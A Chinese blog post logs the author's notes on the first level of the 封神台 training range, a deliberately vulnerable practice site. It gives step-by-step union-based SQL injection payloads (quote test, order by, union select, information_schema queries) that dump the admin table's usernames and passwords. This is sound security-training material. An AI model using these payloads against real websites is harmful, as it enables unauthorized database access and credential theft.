mbp 封神台靶场 一(笔记)
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。
一、寻找注入点
看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。
二、判断字段数
在发现这可以进行SQL注入后便要判断它的字段数,用order by函数对数据库进行测试。发现到了3之后网页出现错误,1和2网页显示正常。
三、判断回显点
使用union select 1,2
判断,页面上有显示。
四、寻找相关内容
union select 1,version()
发现数据库版本为5.5.53
union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()
得到表名为admin,dirs,news,xss
union select 1,group_concat(column_name) from information_schema.columns where table_name = 'admin'
得到字段名为Id,username,password
union select 1,group_concat(username,password) from admin
可知密码
总结:第一关还比较基础,主要还是要了解SQL语句的用法,在今天复现的时候还是忘了许多东西,在判断回显点的时候语句输入对了,但是网页没显示出来,反复查阅了其他大佬的通关步骤,发现并没什么问题,我就考虑到是不是我浏览器的问题,便关闭了Tampermonkey、Darkreader等插件,再回车就显示出来了。最后发现是Darkreader把回显点覆盖了,在爆破字段名输入SQL语句的时候还有点拼写错误。(要注意细节)
mbp 封神台靶场 一(笔记)相关推荐
- 封神台靶场writeup
封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件: 用域名爆破工具,放入字典后爆破:答案为:http://8adc3387c2ed6 ...
- 封神台靶场(一)为了女神小芳 【SQL注入攻击】(超级详细)
文章目录 前言 一.概括 二.题目要求 三.实践步骤 1.找到可以影响网页的参数 2.判断网站是否存在漏洞 3.order by判断字段数 4.union判断回显点 5.数据查询 总结 前言 本篇文章 ...
- “封神台”靶场跑不了爆破,临时解决办法(亲测有效)
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全--杨路恒 最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题, ...
- 封神台靶场 kali训练营第二关WP
打开靶场 测试注入点1' and 1=2 #页面报错,存在注入 直接跑sqlmap sqlmap指令:-u(指定注入点) --dbs(查看库) ...
- 封神台靶场尤里的复仇I第一第二第五第六第七章解题思路(持续更新)
文章目录 一 .第一章 二.第二章 三.第五章 四.第六章 五.第七章 总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表. 本文将 ...
- 封神台靶场-尤里的复仇-第二章
1,随便选择一则新闻,同样判断是否存在SQL注入发现存在and update delete ; insert mid master限制 and update delete ; insert mid m ...
- 封神台靶场-尤里的复仇-第一章
1,在点击过新闻一后发现网址变为http://cntj8003.ia.aqlab.cn/index.php?id=1 ,尝试是否存在注入,输入and 1=1和and 1=2看返回内容是否相同来判断是否 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台—高校靶场ctf—第一期Web web_008
封神台-高校靶场ctf-第一期Web web_008 web_008 php审计 难度:⭐⭐ 首先咱们观察提示获取源码,这时第一想到的就是查看网页源码咱们先点开传送门来看一下题 一个可以提交数据到服务 ...
最新文章
- noip2010提高组3题题解 by rLq
- flask连接不到mysql数据库,即使使用了python flask mysql,也无法将数据提交到数据库(使用python flask mysql)连接.提交()...
- 【深度学习】深度学习模型训练全流程!
- C语言函数题-两对儿参数的交换
- Java文件类字符串getAbsolutePath()方法(带示例)
- 集合——对象数组(引用数据类型数组)
- 2016级算法期末上机-H.难题·AlvinZH's Fight with DDLs III
- oracle坏块修复
- iOS底层探索之多线程(十五)—@synchronized源码分析
- python找重复元素_Python笔记(二)查找重复元素
- 转接口IC ADV7280/ADV7280-M:CVBS转MIPI芯片 10位、4倍过采样标清电视视频解码器,支持去隔行
- 替换jar包中的class文件
- allatori8.0文档翻译-第十四步:Eclipse IDE插件
- android twitter 分享代码,Twitter分享集成
- 计算机制作画报说课稿,幼儿园小班主题秋的画报说课稿教案反思
- 使用pyppeteer或者selenium时,chrome窗口最大化
- 余弦相似度-C#代码实现
- win 7 必备 2
- Instrument 之 time Profiler
- JavaScript学习(七)——对象与数组、内部对象(1)
热门文章
- 三维地形图建模仿真与Matlab之间的数据交换
- 数据仓库之【用户行为数仓】11:【dws层:数据汇总层】【appc层:数据应用层】需求4:每日启动App次数相关指标
- 几款截图软件分析,拷屏,切图和粘贴
- 科技的成就(三十九)
- Found several packages [runtime, main] in ‘/usr/local/Cellar/go/1.18/libexec/src/runtime;
- 3D Tiles 简单介绍
- Base64与Bitmap转换
- 图像处理——孔洞填充算法
- 蒙氏计算机教育目的,蒙氏数学领域基础理论及教育目的
- Mapbox GL可视化之热力图